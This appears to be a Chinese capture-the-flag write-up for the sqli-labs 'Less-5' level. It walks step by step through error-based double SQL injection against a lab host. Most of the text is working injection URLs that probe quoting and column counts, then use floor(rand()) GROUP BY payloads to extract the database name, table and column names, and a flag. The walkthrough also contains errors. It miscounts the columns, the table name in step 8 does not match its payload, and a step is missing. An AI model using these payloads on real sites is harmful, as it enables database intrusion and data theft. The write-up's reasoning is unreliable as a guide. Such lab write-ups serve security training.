Less-5

Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)

1.判断是否存在注入

https://636-9a6d57ca-65dc-4d51-bcca-f0265f719e00.do-not-trust.hacking.run/?id=1'

错误回显 => 存在注入

2.判断参数类型

https://636-9a6d57ca-65dc-4d51-bcca-f0265f719e00.do-not-trust.hacking.run/?id=1 and 1=2

正确回显 => 字符型

3.进行参数闭合

https://636-9a6d57ca-65dc-4d51-bcca-f0265f719e00.do-not-trust.hacking.run/?id=1' and 1=2 --+

错误回显

https://636-9a6d57ca-65dc-4d51-bcca-f0265f719e00.do-not-trust.hacking.run/?id=1' and 1=1 --+

正确回显 => 闭合成功

4.查看这个网站后台数据库所在的表有几列

https://636-9a6d57ca-65dc-4d51-bcca-f0265f719e00.do-not-trust.hacking.run/?id=1' order by 3 --+

正确回显

https://636-9a6d57ca-65dc-4d51-bcca-f0265f719e00.do-not-trust.hacking.run/?id=1' order by 4 --+

错误回显 => 4位显示位

5.进行双注入查询，查询所在数据库名称

https://636-65bd159c-591c-4f42-83ed-5509a7f22efb.do-not-trust.hacking.run/?id=1' union SELECT null,count(*),concat((database()),floor(rand()*2))as a from information_schema.tables group by a --+

6.查看数据库的表

https://636-65bd159c-591c-4f42-83ed-5509a7f22efb.do-not-trust.hacking.run/?id=1' union select null,count(*),concat((select table_name from information_schema.tables where table_schema='security'limit 0,1),floor(rand()*2))as a from information_schema.tables group by a --+

8.查看tG7wdqTJ表中的列

https://636-65bd159c-591c-4f42-83ed-5509a7f22efb.do-not-trust.hacking.run/?id=1' union select null,count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name="RqSknMg2" limit 1,1),floor(rand()*2))as a from information_schema.tables group by a --+

9.查看表中的flag列中的数据

https://636-65bd159c-591c-4f42-83ed-5509a7f22efb.do-not-trust.hacking.run/?id=1' union select null,count(*),concat((select flag from RqSknMg2 limit 3,1),floor(rand()*2))as a from information_schema.tables group by a --+